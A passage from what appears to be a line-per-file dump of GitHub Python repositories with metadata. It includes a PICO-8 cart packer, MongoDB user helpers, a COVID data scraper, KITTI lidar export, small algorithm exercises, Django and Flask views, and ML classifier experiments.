22\\n\",\n\t\t\t\t\t\"__lua__\\n\",\n\t\t\t\t\t\"\\n\",\n\t\t\t\t\t\"__gfx__\\n\"]\n\t\tfile = open(args.output, \"w\")\n\t\tfor line in cartText:\n\t\t\tfile.write(line)\n\t\tfile.close\n\t\n\tcartLine = 0\n\t\n\tdef changePopToArea(targetArea, writeToThisArea):\n\t\tif writeToThisArea:\n\t\t\tpopToArea = None\n\t\telse:\n\t\t\tpopToArea = targetArea\n\t\t\t\n\twhile cartLine < len(cartText):\n\t\n\t\tif cartText[cartLine].startswith(\"__label__\"):\n\t\t\tbreak\n\t\n\t\tif cartText[cartLine].startswith(\"__\"):\n\t\t\tstartPopping = True \n\t\t\tif cartText[cartLine].startswith(\"__gfx__\"):\n\t\t\t\tif writeGfxArea:\n\t\t\t\t\tpopToArea = None\n\t\t\t\telse:\n\t\t\t\t\tpopToArea = outputGfxArea\n\t\t\telif cartText[cartLine].startswith(\"__map__\"):\n\t\t\t\tif writeMapArea:\n\t\t\t\t\tpopToArea = None\n\t\t\t\telse:\n\t\t\t\t\tpopToArea = outputMapArea\n\t\t\telif cartText[cartLine].startswith(\"__gff__\"):\n\t\t\t\tif writeGffArea:\n\t\t\t\t\tpopToArea = None\n\t\t\t\telse:\n\t\t\t\t\tpopToArea = outputGffArea\n\t\t\telif cartText[cartLine].startswith(\"__music__\"):\n\t\t\t\tif writeMusicArea:\n\t\t\t\t\tpopToArea = None\n\t\t\t\telse:\n\t\t\t\t\tpopToArea = outputMusicArea\n\t\t\telif cartText[cartLine].startswith(\"__sfx__\"):\n\t\t\t\tif writeSfxArea:\n\t\t\t\t\tpopToArea = None\n\t\t\t\telse:\n\t\t\t\t\tpopToArea = outputSfxArea\n\t\t\telse:\n\t\t\t\tstartPopping = False\n\t\t\t\n\t\tif startPopping:\n\t\t\tif popToArea == None:\n\t\t\t\tcartText.pop(cartLine)\n\t\t\telse:\n\t\t\t\tpopToArea.append(cartText.pop(cartLine))\n\t\telse:\n\t\t\tcartLine += 1\n\t\t\t\n\tdef writeArea(outputArea):\n\t\tfor i in range(len(outputArea) - 1, -1, -1):\n\t\t\t#print(outputArea[i])\n\t\t\tcartText.insert(cartLine, outputArea[i])\n\t\t\t\n\twriteArea(outputMusicArea)\n\twriteArea(outputSfxArea)\n\twriteArea(outputMapArea)\n\twriteArea(outputGffArea)\n\twriteArea(outputGfxArea)\n\t\n\tfilterLines=[\n\t\t\"hilbert_unwrap.p8l\",\n\t\t\"rle_decomp.p8l\",\n\t\t\"huffman_decomp.p8l\",\n\t\t\"hex_to_dec.p8l\",\n\t\t\"str_to_mem.p8l\",\n\t\t\"mem_to_str.p8l\",\n\t\t\"parse_table.p8l\",\n\t\t\"larkstongue.p8l\"]\n\t\n\tfor filterLine in filterLines:\n\t\tcartText = list(filter(lambda line: filterLine not in line, cartText))\n\t\n\tlineNumber = 3\n\twhile cartText[lineNumber].startswith(\"--\"):\n\t\tlineNumber += 1\n\t\t\n\tcartText.insert(lineNumber, \"#include \" + loaderFileName + \"\\n\")\n\tif usesHuffman:\n\t\tcartText.insert(lineNumber, \"#include include/huffman_decomp.p8l\\n\")\n\tif usesRLE:\n\t\tcartText.insert(lineNumber, \"#include include/rle_decomp.p8l\\n\")\n\tif usesHilbert:\n\t\tcartText.insert(lineNumber, \"#include include/hilbert_unwrap.p8l\\n\")\n\tcartText.insert(lineNumber, \"#include include/parse_table.p8l\\n\")\n\tcartText.insert(lineNumber, \"#include include/mem_to_str.p8l\\n\")\n\tcartText.insert(lineNumber, \"#include include/str_to_mem.p8l\\n\")\n\tcartText.insert(lineNumber, \"#include include/hex_to_dec.p8l\\n\")\n\t \n\tfile = open(args.output, \"w\")\n\tfor line in cartText:\n\t\tfile.write(line)\n\tfile.close()\n \n # output summary\n\t\n\tspaceSavings = 100 * (1 - totalSize / totalRawSize)\n\t\t\n\tprint(\"Total size of compressed data: \" + str(totalSize) + \" (\" + \"{:.2f}\".format(spaceSavings) + \" %)\")\n\t\n\tsuggestions = []\n\t\n\tif not args.no_hilbert:\n\t\thilbertDifference = totalSizeWithoutHilbert - totalSize\n\t\thilbertPercentage = 100 * hilbertDifference / totalSizeWithoutHilbert\t\n\t\tsuggestions.append([hilbertPercentage, \"Hilbert mapping only saves you \" + str(hilbertDifference) + \" nibbles (\" + \"{:.2f}\".format(hilbertPercentage) + \" %) - consider using --no-hilbert to save tokens\"])\n\n\tif not args.no_rle:\n\t\trleDifference = totalSizeWithoutRLE - totalSize\n\t\trlePercentage = 100 * rleDifference / totalSizeWithoutRLE\n\t\tsuggestions.append([rlePercentage, \"RLE only saves you \" + str(rleDifference) + \" nibbles (\" + \"{:.2f}\".format(rlePercentage) + \" %) - consider using --no-rle to save tokens\"]) \n\n\tif not args.no_huffman:\n\t\thuffmanDifference = totalSizeWithoutHuffman - totalSize\n\t\thuffmanPercentage = 100 * huffmanDifference / totalSizeWithoutHuffman\n\t\tsuggestions.append([huffmanPercentage, \"Huffman coding only saves you \" + str(huffmanDifference) + \" nibbles (\" + \"{:.2f}\".format(huffmanPercentage) + \" %) - consider using --no-hilbert to save tokens\"])\n\t\n\tif len(suggestions) > 0:\n\t\tsuggestions = sorted(suggestions, key = lambda line: line[0])\n\t\tif suggestions[0][0] < 2:\n\t\t\tprint(suggestions[0][1])\n\t\t\n\tprint(\"Warning! Significant amount of data (\" + str(len(overflowData)) + \" nibbles) encoded in Lua, increasing the compressed size of your cart\")\n","repo_name":"jorikemppi/larkstongue","sub_path":"larkstongue/pack.py","file_name":"pack.py","file_ext":"py","file_size_in_byte":18252,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"29"} +{"seq_id":"18219010102","text":"from pymongo import errors\n\n# mongod --dbpath D:\\\\mgo\\\\drow\n\nasync def get_user(db, username=None, email=None, no_metadata=True):\n return await db.users.find_one(\n {'email': email} if email else {'_id': username},\n projection={'_id': False, 'key': False} if no_metadata else None)\n\n\nasync def insert_user(db, **kwobj):\n data = {'_id': kwobj.pop('username')}\n data.update(kwobj)\n data.setdefault(\"roles\", [])\n data['roles'].append(\"reg\")\n try:\n return await db.users.insert_one(data)\n except errors.DuplicateKeyError:\n return None\n\n\nasync def update_user(db, **kwobj):\n res = await db.users.update_one(\n {'_id': kwobj.pop('username')},\n {'$set': kwobj})\n return res.matched_count, res.modified_count\n\n\nasync def remove_user(db, username):\n return (await db.users.delete_one({'_id': username})).deleted_count or None\n","repo_name":"AbsoluteVirtue/m.pis21.2","sub_path":"store/mgo.py","file_name":"mgo.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"3770283043","text":"import requests\nfrom lxml.html import fromstring\n\nimport pandas as pd\nimport json\n\nfrom unidecode import unidecode\n\nfrom datetime import datetime\n\nimport numpy as np\n\nfrom .utils import is_visible, highcharts_parser\nfrom .constants import AVAILABLE_COUNTRIES, AVAILABLE_CHARTS\n\n\ndef overview(as_json=False):\n \"\"\"\n This function retrieves the coronavirus data overview from all the available countries \n from worldometers.info/coronavirus/, which contains real time data and statistics from multiple\n features realted to the virus. For more information, please visit: https://www.worldometers.info/coronavirus/\n\n Args:\n as_json (:obj:`bool`):\n set to `True` if overview wants to be retrieved as :obj:`json`, if not, \n leave default value (`False`).\n\n Returns:\n :obj:`pandas.DataFrame` - overview\n This function returns a :obj:`pandas.DataFrame` by default (if `as_json` parameter\n is set to `False`, if `True` a :obj:`json` is returned), containing the world\n overview coronavirus data.\n\n Raises:\n ValueError: raised if any of the introduced parameters is not valid\n ConnectionError: raised if connection with Worldometers failed\n\n \"\"\"\n\n if not isinstance(as_json, bool):\n raise ValueError(\"as_json parameter value can just be either True or False.\")\n\n url = \"https://www.worldometers.info/coronavirus\"\n\n req = requests.get(url)\n\n if req.status_code != 200:\n raise ConnectionError(\"Connection to Worldometers.info did not succeed, error code: \" + str(req.status_code))\n\n root = fromstring(req.text)\n table = root.xpath(\".//table[@id='main_table_countries_today'][1]\")[0]\n\n thead = table.xpath(\".//thead/tr/th\")\n\n columns = list()\n\n for th in thead:\n if is_visible(th) is True:\n column = th.text_content().replace('\\n', '').replace(u'\\xa0', u'').strip()\n columns.append(column)\n\n tbody = table.xpath(\".//tbody/tr\")\n\n rows = list()\n\n for tr in tbody:\n if is_visible(tr) is True:\n rows.append([value.text_content().strip() for value in tr.xpath(\".//td\") if is_visible(value) is True])\n\n data = pd.DataFrame(rows, columns=columns)\n\n data.drop(columns=['#'], inplace=True)\n\n data[\"Country,Other\"] = data['Country,Other'].str.replace(':', '')\n\n cols = list(set(data.columns) - set(['Country,Other']))\n\n data.replace('', '0', inplace=True)\n data.replace('N/A', '0', inplace=True)\n\n for col in cols:\n data[col] = data[col].str.replace('+', '').str.replace(',', '').astype(float).astype(int)\n\n if as_json is False:\n return data\n elif as_json is True:\n return json.loads(json.dumps(data.to_dict(orient='records')))\n\n\ndef data(country, chart, as_json=False):\n \"\"\"\n This function will retrieve the coronavirus data overview from all the available countries \n from worldometers.info/coronavirus/, which contains real time data and statistics from multiple\n features realted to the virus. For more information, please visit: https://www.worldometers.info/coronavirus/\n\n Args:\n chart (:obj:`str`):\n name of the country to retrieve the COVID data from (available values at: \n `covid_daily.constants.AVAILABLE_COUNTRIES`)\n chart (:obj:`str`):\n name of the chart to retrieve the COVID data from (available values at: \n `covid_daily.constants.AVAILABLE_CHARTS`)\n as_json (:obj:`bool`):\n set to `True` if overview wants to be retrieved as :obj:`json`, if not, \n leave default value (`False`).\n\n Returns:\n :obj:`pandas.DataFrame` - data\n This function returns a :obj:`pandas.DataFrame` by default (if `as_json` parameter\n is set to `False`, if `True` a :obj:`json` is returned), containing the COVID data \n of the introduced chart from the introduced country.\n\n Raises:\n ValueError: raised if any of the introduced parameters is not valid\n ConnectionError: raised if connection with Worldometers failed\n\n \"\"\"\n\n if not isinstance(country, str):\n raise ValueError(\"country must be a valid str.\")\n\n country = unidecode(country.strip().lower().replace(' ', '-'))\n\n if country not in AVAILABLE_COUNTRIES:\n raise ValueError(\"Introduced country is a valid value, but not a valid country.\")\n\n if not isinstance(chart, str):\n raise ValueError(\"chart must be a valid str.\")\n\n if chart not in AVAILABLE_CHARTS:\n raise ValueError(\"Introduced chart is a valid value, but not a valid chart.\")\n\n url = \"https://www.worldometers.info/coronavirus/country/\" + country + \"/\"\n \n req = requests.get(url)\n \n if req.status_code != 200:\n raise ConnectionError(\"Connection to Worldometers.info did not succeed, error code: \" + str(req.status_code))\n \n root = fromstring(req.text)\n scripts = root.xpath(\".//script\")\n \n flag = False\n\n for script in scripts:\n if not script.text_content().strip().__contains__(\"Highcharts.chart\"):\n continue\n\n chart_title = highcharts_parser(highchart_script=script, just_title=True)\n\n if chart_title != chart:\n continue\n\n chart = highcharts_parser(highchart_script=script)\n\n x = chart['series'][0]['data']\n y = [datetime.strptime(value, \"%b %d, %Y\") for value in chart['xAxis']['categories']]\n\n data = pd.DataFrame({'Date': y, chart['column']: x})\n data.set_index('Date', inplace=True)\n\n flag = True\n\n if not flag:\n raise RuntimeError(\"Information could not be retrieved since it is not available at Worldometers.info!\")\n\n return data\n","repo_name":"alvarobartt/covid-daily","sub_path":"covid_daily/covid.py","file_name":"covid.py","file_ext":"py","file_size_in_byte":5721,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"29"} +{"seq_id":"27862036184","text":"# -*- coding: utf-8 -*-\n\"\"\"\nLoad KITTI raw data with pykitti and export the data for SLAM.\n\nhttps://github.com/utiasSTARS/pykitti\n\npointclouds:\nThe pointclouds are saved in the velodyne coordinate system as txt: x y z\n\nstart pose:\nThe start pose is saved in the GPS/IMU coordinate system (UTM) as txt: x y yaw\n\nground truth:\nThe ground truth is a list of poses in the GPS/IMU coordinate system (UTM), \nsaved as txt: x y yaw\n\ncalib: 3x4 Transformation matrix (3x3 rotation matrix | 3x1 translation vector),\ntransform a point from GPS/IMU coordinate system to velodyne coordinate system,\nsaved as txt.\n\nAll coordinate systems as described in the KITTI readme. (see raw data \ndevelopment kit)\n\nPlease download the data and the raw data development kit:\nhttp://www.cvlibs.net/datasets/kitti/raw_data.php\n\n@author: Thorsten\n\"\"\"\n\nimport numpy as np\nimport pykitti\nimport utm\nimport os\n\n\"\"\"\nLoad kitti dataset\n\"\"\"\nbasedir = 'C:/KITTI'\ndate = '2011_09_30'\ndrive = '0027'\npathSave = basedir+'/'+date+'/'+date+'_'+drive+'_export/'\nif not os.path.exists(pathSave):\n os.makedirs(pathSave)\n\ndataset = pykitti.raw(basedir,date,drive)\ngpsImu = dataset.oxts\n\n\"\"\"\nExtract calibration (translation GPS/IMU -> Velodyne)\n\"\"\"\nT = np.matrix(dataset.calib.T_velo_imu[0:2,3]).transpose()\n\n\"\"\"\nProcess all measurements\n\"\"\"\ngroundTruth = []\nnr = 0\n\nfor scan in dataset.velo:\n print('Process measurement: '+str(nr))\n \n \"\"\"\n Extract and save pointcloud\n \"\"\"\n # get pointcloud (x y z intensity) and delete intensity\n pointcloud = np.asarray(scan)\n pointcloud = np.delete(pointcloud,3,1)\n \n # save pointcloud as txt\n #np.savetxt(pathSave+'pointcloud_'+str(nr)+'.txt',pointcloud,delimiter=',',fmt='%1.3f')\n \n # save pointcloud as binary \n np.save(pathSave+'pointcloudNP_'+str(nr),pointcloud)\n\n \"\"\"\n Extract ground truth and transform it to velodyne position\n \"\"\"\n pose = next(gpsImu)\n latitude = pose.packet.lat\n longitude = pose.packet.lon\n yaw = pose.packet.yaw\n # latitude and longitude to UTM\n posUtm = utm.from_latlon(latitude,longitude)\n posUtm = np.matrix([posUtm[0],posUtm[1]])\n # Rotation Matrix to rotate IMU2VELO translation vector\n R = np.matrix([[np.cos(yaw), -np.sin(yaw)],[np.sin(yaw),np.cos(yaw)]])\n \n # Rotate translation vector \n T_rot = R*T \n\n # Calculate Ground Truth at the position of the velodyne LIDAR\n posUtmTrans = posUtm-np.transpose(T_rot)\n \n # add position x y yaw to list\n groundTruth.append(np.matrix([posUtmTrans[0,0], posUtmTrans[0,1], pose.packet.yaw]))\n \n nr = nr + 1\n\n\"\"\"\nSave first pose\n\"\"\" \nnp.savetxt(pathSave+'firstPose.txt',groundTruth[0],delimiter=',',fmt='%1.3f')\n\n\"\"\" \nSave ground truth\n\"\"\"\ngroundTruth = np.vstack(groundTruth)\nnp.savetxt(pathSave+'groundTruth.txt',groundTruth,delimiter=',',fmt='%1.3f')\n\n\n","repo_name":"MouvementMondial/MappingWithKnownPoses","sub_path":"KittiExportRaw.py","file_name":"KittiExportRaw.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"9016431497","text":"# 二叉树的深度\n# 输入一棵二叉树的根节点,求该树的深度。\n# 从根节点到叶节点依次经过的节点(含根,叶节点)形成树的一条路径,最长路径的长度为树的深度。\n\n'''\n思路:\n如果一棵树只有一个节点,那么它的深度为1\n如果根节点只有左子树而没有右子树,那么树的深度应该是其左子树的深度加1\n如果根节点只有右子树没有左子树,同理\n如果既有左子树也有右子树,那么树的深度就是左、右子树深度的较大值加1\n'''\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def TreeDepth(self, pRoot):\n # write code here\n if not pRoot:\n return 0\n left = self.TreeDepth(pRoot.left)\n right = self.TreeDepth(pRoot.right)\n return max(left, right) + 1","repo_name":"Gustee/CodingInterview-Chinese-version2","sub_path":"chap6/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"72294266959","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.legend_handler import HandlerLine2D\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.externals import joblib\n\ndef max_iter(train_X, train_Y, testX, targetTest):\n iterations = np.linspace(200, 1000, 100, endpoint=True)\n train_results = []\n test_results = []\n for i in iterations:\n # nn = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(int(neurons)), random_state=0)\n nn = MLPClassifier(solver='adam', alpha=1e-5, hidden_layer_sizes=(125), random_state=0, max_iter=int(i))\n nn.fit(train_X, train_Y)\n\n train_pred = nn.predict(train_X)\n\n trainAcc = accuracy_score(train_Y, train_pred)\n train_results.append(trainAcc)\n\n y_predTest = nn.predict(testX)\n\n testAcc = accuracy_score(targetTest, y_predTest)\n test_results.append(testAcc)\n\n line1, = plt.plot(iterations, train_results, 'b', label='Train Accuracy')\n line2, = plt.plot(iterations, test_results, 'r', label='Test Accuracy')\n\n plt.legend(handler_map={line1: HandlerLine2D(numpoints=2)})\n plt.interactive(False)\n plt.ylabel('Accuracy')\n plt.xlabel('number of iterations')\n plt.show()\n\ndef numberOfNeurons(train_X, train_Y, testX, targetTest):\n num_neurons = np.linspace(1, 200, 200, endpoint=True)\n train_results = []\n test_results = []\n for neurons in num_neurons:\n # nn = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(int(neurons)), random_state=0)\n nn = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(int(neurons), 125), random_state=0)\n nn.fit(train_X, train_Y)\n\n train_pred = nn.predict(train_X)\n\n trainAcc = accuracy_score(train_Y, train_pred)\n train_results.append(trainAcc)\n\n y_predTest = nn.predict(testX)\n\n testAcc = accuracy_score(targetTest, y_predTest)\n test_results.append(testAcc)\n\n line1, = plt.plot(num_neurons, train_results, 'b', label='Train Accuracy')\n line2, = plt.plot(num_neurons, test_results, 'r', label='Test Accuracy')\n\n plt.legend(handler_map={line1: HandlerLine2D(numpoints=2)})\n plt.interactive(False)\n plt.ylabel('Accuracy')\n plt.xlabel('number of neurons')\n plt.show()\n\n\n# ###Dataset 1\ndf = np.genfromtxt('DataSet-Release 1/ds1/ds1Info.csv', delimiter=',')\ndf_alpha_numeric = np.genfromtxt('DataSet-Release 1/ds1/ds1Train.csv', delimiter=',')\ndf_alpha_numeric_validation = np.genfromtxt('DataSet-Release 1/ds1/ds1Val.csv', delimiter=',')\n\ntrain_X = df_alpha_numeric[:, :1024]\ntrain_Y = df_alpha_numeric[:, 1024]\n\ntestX = df_alpha_numeric_validation[:, :1024]\ntargetTest = df_alpha_numeric_validation[:, 1024]\n# numberOfNeurons(train_X, train_Y, testX, targetTest)\n\n# max_iter(train_X, train_Y, testX, targetTest)\n\nclassifier = MLPClassifier(solver='sgd', alpha=1e-5, hidden_layer_sizes=(110), random_state=0, max_iter=440)\nclassifier.fit(train_X, train_Y)\n\njoblib.dump(classifier, 'nn1classifier.joblib')\n\npredictedTarget = classifier.predict(testX)\nprint('Dataset1 training accuracy')\nprint(accuracy_score(predictedTarget, targetTest))\n\n\n###Dataset 2\ndf1 = np.genfromtxt('DataSet-Release 1/ds2/ds2Info.csv', delimiter=',')\ndf_greek = np.genfromtxt('DataSet-Release 1/ds2/ds2Train.csv', delimiter=',')\ndf_greek_valid = np.genfromtxt('DataSet-Release 1/ds2/ds2Val.csv', delimiter=',')\n\ntrain_GreekX = df_greek[:, :1024]\ntrain_GreekY = df_greek[:, 1024]\n\ntestGreekX = df_greek_valid[:, :1024]\ntestGreekTarget = df_greek_valid[:, 1024]\n\n# numberOfNeurons(train_GreekX, train_GreekY, testGreekX, testGreekTarget)\n# max_iter(train_GreekX, train_GreekY, testGreekX, testGreekTarget)\nclassifier2 = MLPClassifier(solver='adam', alpha=1e-5, hidden_layer_sizes=(125), random_state=0, max_iter=250)\nclassifier2.fit(train_GreekX, train_GreekY)\n\njoblib.dump(classifier2, 'nn2classifier.joblib')\n\npredictGreek = classifier2.predict(testGreekX)\nprint('Dataset 2')\nprint(accuracy_score(testGreekTarget, predictGreek))\n","repo_name":"ayushbahuguna8005/AI-Project2","sub_path":"NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"43969336377","text":"\"\"\"\nDefinition of views.\n\"\"\"\n\nfrom django.shortcuts import render\nfrom django.http import HttpRequest\nfrom django.template import RequestContext\nfrom datetime import datetime\n\ndef home(request):\n \"\"\"Renders the home page.\"\"\"\n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/index.html',\n {\n 'title':'Home Page',\n 'year':datetime.now().year,\n }\n )\n\ndef contact(request):\n \"\"\"Renders the contact page.\"\"\"\n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/contact.html',\n {\n 'title':'Contact',\n 'message':'Your contact page.',\n 'year':datetime.now().year,\n }\n )\n\ndef about(request):\n \"\"\"Renders the about page.\"\"\"\n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/about.html',\n {\n 'title':'About',\n 'message':'Your application description page.',\n 'year':datetime.now().year,\n }\n )\n\ndef invite(request, code):\n \"\"\"Renders the invite page.\"\"\"\n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/invite.html',\n {\n 'title':'Invite',\n 'message':'Invite it.',\n 'year':datetime.now().year,\n 'code':code,\n }\n )\n\nfrom app.forms import CodeForm\n\ndef askcode(request):\n \"\"\"Renders the ask code page.\"\"\"\n assert isinstance(request, HttpRequest)\n form_class = CodeForm\n return render(\n request,\n 'app/askcode.html',\n {\n 'title':'Ask code',\n 'message':'Do ask code.',\n 'form':form_class,\n 'year':datetime.now().year\n }\n )\n\nimport json\nfrom django.http import HttpResponse\nfrom app.models import alumni as Alumnus\nfrom app.models import invites as Invite\n\ndef generate_code(request):\n code = request.GET['code']\n alumnus_id = request.GET['id']\n inviter = Invite.objects.get(code=code).alumni\n invitee = Alumnus.objects.get(alumnus_id = alumnus_id)\n inv = Invite(alumni_id = alumnus_id)\n inv.save()\n data = {\n 'code': inv.code,\n 'invitee': unicode(invitee),\n 'invitee_name': invitee.full_name,\n 'inviter': unicode(inviter),\n }\n return HttpResponse(json.dumps(data), 'application/json')\n\n\ndef get_alumni(request):\n #if request.is_ajax():\n q = request.GET.get('term', '')\n als = Alumnus.objects.filter(full_name__icontains = q )[:20]\n results = []\n for al in als:\n al_json = {}\n al_json['id'] = al.alumnus_id\n al_json['label'] = unicode(al)\n al_json['value'] = al.full_name\n results.append(al_json)\n data = json.dumps(results)\n #else:\n # data = 'fail'\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n","repo_name":"mxposed/alumni-auth","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"29"} +{"seq_id":"71178464398","text":"import operator\n\ninterestingWordsAndCount = {}\n\ndef loadInCommonWords():\n\tfin = open('100MostCommonWords.txt')\n\tfor line in fin:\n\t\treturn set(line.split(', '))\n\ndef RepresentsInt(s):\n try: \n int(s)\n return True\n except ValueError:\n return False\n\ndef getIntPart(val):\n\ttoReturn = \"\"\n\tfor char in val:\n\t\tif(RepresentsInt(char)):\n\t\t\ttoReturn += char\n\treturn int(toReturn)\n\ndef makeGoInteresting(commonWords):\n\tfin = open('wordsLogFile.txt')\n\tfor line in fin:\n\t\tfor word in line.split('{')[1].split(','):\n\t\t\tif not word.split(':')[0] in commonWords:\n\t\t\t\tif(len(word.split(':')) == 2):\n\t\t\t\t\tif(word.split(':')[0] in interestingWordsAndCount):\n\t\t\t\t\t\tif(RepresentsInt(word.split(':')[1])):\n\t\t\t\t\t\t\tinterestingWordsAndCount[word.split(':')[0]] += int(word.split(':')[1])\n\t\t\t\t\telse:\n\t\t\t\t\t\tif(RepresentsInt(word.split(':')[1])):\n\t\t\t\t\t\t\tinterestingWordsAndCount[word.split(':')[0]] = int(word.split(':')[1])\n\n\timport operator\n\tinterestingWordsAndCountSorted = sorted(interestingWordsAndCount.iteritems(), key=operator.itemgetter(1))\n\treturn interestingWordsAndCountSorted\n\ndef saveDictionary(dictionary):\n\timport csv\n\tw = csv.writer(open(\"interestingWords.csv\", \"w\"))\n\tfor key in dictionary:\n\t w.writerow(key)\n\nif __name__ == '__main__':\n\tsaveDictionary(makeGoInteresting(loadInCommonWords()))\n\n\n","repo_name":"ThomasTheDane/DataScience2014CDC","sub_path":"makeInteresting.py","file_name":"makeInteresting.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"28908731231","text":"class ListNode:\n def __init__(self, key, prev=None, next=None):\n self.key = key\n self.prev = prev\n self.next = next\n\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def search(self, k):\n x = self.head\n while x is not None and x.key != k:\n x = x.next\n return x\n\n def prepend(self, x):\n x.prev = None\n x.next = self.head\n if self.head is not None:\n self.head.prev = x\n self.head = x\n\n def insert(self, x, y=None):\n if y is None:\n self.prepend(x)\n else:\n x.next = y.next\n x.prev = y\n if y.next is not None:\n y.next.prev = x\n y.next = x\n\n def delete(self, x):\n if x.prev is not None:\n x.prev.next = x.next\n else:\n self.head = x.next\n if x.next is not None:\n x.next.prev = x.prev\n\n\nclass LinkedListWithSentinel:\n def __init__(self):\n self.null = ListNode(None)\n self.null.prev = self.null\n self.null.next = self.null\n\n def search(self, k):\n self.null.key = k\n x = self.null.next\n while x.key != k:\n x = x.next\n return None if x == self.null else x\n\n def prepend(self, x):\n self.insert(x)\n\n def insert(self, x, y=None):\n if y is None:\n y = self.null\n x.next = y.next\n x.prev = y\n y.next.prev = x\n y.next = x\n\n def delete(self, x):\n x.prev.next = x.next\n x.next.prev = x.prev\n\n\n__all__ = [\"ListNode\", \"LinkedList\", \"LinkedListWithSentinel\"]\n","repo_name":"1290185595/Introduction-to-Algorithms","sub_path":"Part3/Chapter1/LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"4856319594","text":"import os\nimport shutil\nimport numpy as np\n\nsource = r\"C:\\work\\parse\\photos\"\nresult = 'blb_city'\nserial_name = 'blb'\n\nos.mkdir(result)\n\ndata = os.listdir(source)\n\nn_photos = len(data)\n\nmax_frames = 100\nmax_episode = 999\nmark = 'left'\nn_seasons = int(np.ceil(n_photos/(max_frames*max_episode)))\nseason1 = 2\nfor season in range(n_seasons):\n path_to_season = os.path.join(result, f'{serial_name}.{season1+1:03d}')\n os.mkdir(path_to_season)\n n_episode = int(min(max_episode, np.ceil(\n n_photos/max_frames-max_episode*season)))\n for episode in range(n_episode):\n path_to_episode_frames = os.path.join(\n path_to_season, f'{serial_name}.{season1+1:03d}.{episode+1:03d}.{mark}')\n os.mkdir(path_to_episode_frames)\n n_frames = int(min(max_frames, np.ceil(\n n_photos-(max_episode*season+episode)*max_frames)))\n for frame in range(n_frames):\n file = data.pop()\n file_format = file.split('.')[-1]\n if file_format == 'jpeg':\n file_format = 'jpg'\n shutil.copy(os.path.join(source, file), os.path.join(\n path_to_episode_frames, f'{serial_name}.{season1+1:03d}.{episode+1:03d}.{mark}.{frame:06d}.{file_format}'))\n","repo_name":"edkochak/SegmentMarker_to_yolo","sub_path":"nonmark_to_segmentmarker.py","file_name":"nonmark_to_segmentmarker.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"31677190390","text":"from flask import Blueprint, request, jsonify, make_response\nfrom app import sqlDB, marsh\nfrom app.models.aeroporto import Aeroporto, AeroportoSchema\n\n\nclass AirportController:\n airport_controller = Blueprint(\n name='aeroporto_controller', import_name=__name__)\n\n @airport_controller.route('/aeroportos', methods=['GET'])\n def get_airport():\n aeroporto_list = Aeroporto.query.all()\n aeroporto_schema = AeroportoSchema(many=True)\n aeroporto_json = aeroporto_schema.dump(aeroporto_list)\n return make_response(jsonify({\"Aeroportos\": aeroporto_json}), 200)\n\n @airport_controller.route('/aeroportos/', methods=['GET'])\n def get_airport(iata):\n aeroporto = Aeroporto.query.filter_by(codigo_iata=iata).first()\n if aeroporto:\n aeroporto_schema = AeroportoSchema()\n aeroporto_json = aeroporto_schema.dump(aeroporto)\n return make_response(jsonify({\"Aeroporto\": aeroporto_json}), 200)\n else:\n return make_response(jsonify({\"Aeroporto\": None}), 404)\n\n @airport_controller.route('/aeroportos', methods=['POST'])\n def post_airport():\n data = request.get_json()\n aeroporto_schema = AeroportoSchema(unknown=marsh.EXCLUDE)\n aeroporto = aeroporto_schema.load(data)\n result = aeroporto_schema.dump(aeroporto.create())\n return make_response(jsonify({\"Aeroporto\": result}), 201)\n\n @airport_controller.route('/aeroportos/', methods=['PUT'])\n def put_airport(iata):\n aeroporto = Aeroporto.query.filter_by(codigo_iata=iata).first_or_404()\n aeroporto_schema = AeroportoSchema()\n data = request.get_json()\n\n if data.get('nome_aeroporto'):\n aeroporto.nome_aeroporto = data['nome_aeroporto']\n if data.get('codigo_iata'):\n aeroporto.codigo_iata = data['codigo_iata']\n if data.get('cidade'):\n aeroporto.cidade = data['cidade']\n if data.get('pais'):\n aeroporto.pais = data['pais']\n if data.get('latitude'):\n aeroporto.latitude = data['latitude']\n if data.get('longitude'):\n aeroporto.longitude = data['longitude']\n if data.get('altitude'):\n aeroporto.altitude = data['altitude']\n\n sqlDB.session.add(aeroporto)\n sqlDB.session.commit()\n\n update_aeroporto = aeroporto_schema.dump(aeroporto)\n return make_response(jsonify({\"Aeroporto\": update_aeroporto}), 200)\n\n @airport_controller.route('/aeroportos/', methods=['DELETE'])\n def delete_airport(iata):\n aeroporto = 